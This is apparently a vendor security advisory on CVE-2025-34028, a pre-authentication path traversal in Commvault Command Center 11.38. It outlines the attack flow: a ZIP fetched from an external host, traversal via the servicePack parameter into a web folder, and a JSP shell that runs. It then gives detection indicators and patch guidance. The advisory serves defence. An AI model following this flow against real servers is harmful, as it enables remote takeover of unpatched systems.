On April 22, 2025, a critical path traversal vulnerability (CVE-2025-34028) was disclosed in Commvault Command Center Innovation Release 11.38. An unauthenticated attacker can upload a specially crafted ZIP archive via the /deployWebpackage.do endpoint, trigger a server-side request forgery (SSRF), and achieve full Remote Code Execution (RCE).
Technical Details
- Vuln. ID: CVE-2025-34028
- Endpoint: /commandcenter/deployWebpackage.do
- Root Cause: No input filtering on file paths allows traversal (CWE-22).
- Affected Versions: Commvault Command Center Innovation Release 11.38.0 through 11.38.19
- Severity: CVSS 3.1: 10.0 CRITICAL
Attack Flow
- Attacker sends a request to fetch a malicious ZIP from an external host.
- ZIP is uncompressed into a .tmp directory under attacker control.
- servicePack parameter is abused to traverse into a web-accessible folder (e.g., ../../Reports/MetricsUpload/shell).
- Malicious JSP is executed, granting pre-auth RCE.
Detection & IOCs
Log every POST to /deployWebpackage.do and alert on payloads that reference external URLs or begin with ZIP magic bytes (PK\x03\x04).
Enable file‐integrity monitoring to catch new .tmp folders or JSP files in web‐accessible paths (e.g., Reports/MetricsUpload).
Tune your IDS/IPS to flag outbound HTTP requests from the Command Center server (SSRF patterns).
Finally, run a daily script that scans for recently created or modified .zip and .jsp files in your application directories.
Mitigation & Recommendations
Commvault has released fixed builds (11.38.20 and 11.38.25) and urges all Innovation Release users to apply these updates immediately. You can read the advisory here.
Note: These updates are automatically handled, so manual intervention isn’t necessary.
Organizations should also consider:
- Isolating Command Center from untrusted networks.
- Implementing strict WAF/NGFW rules to block unauthorized access to /deployWebpackage.do.
- Deploy OP Innovate scanners to verify file-system integrity.
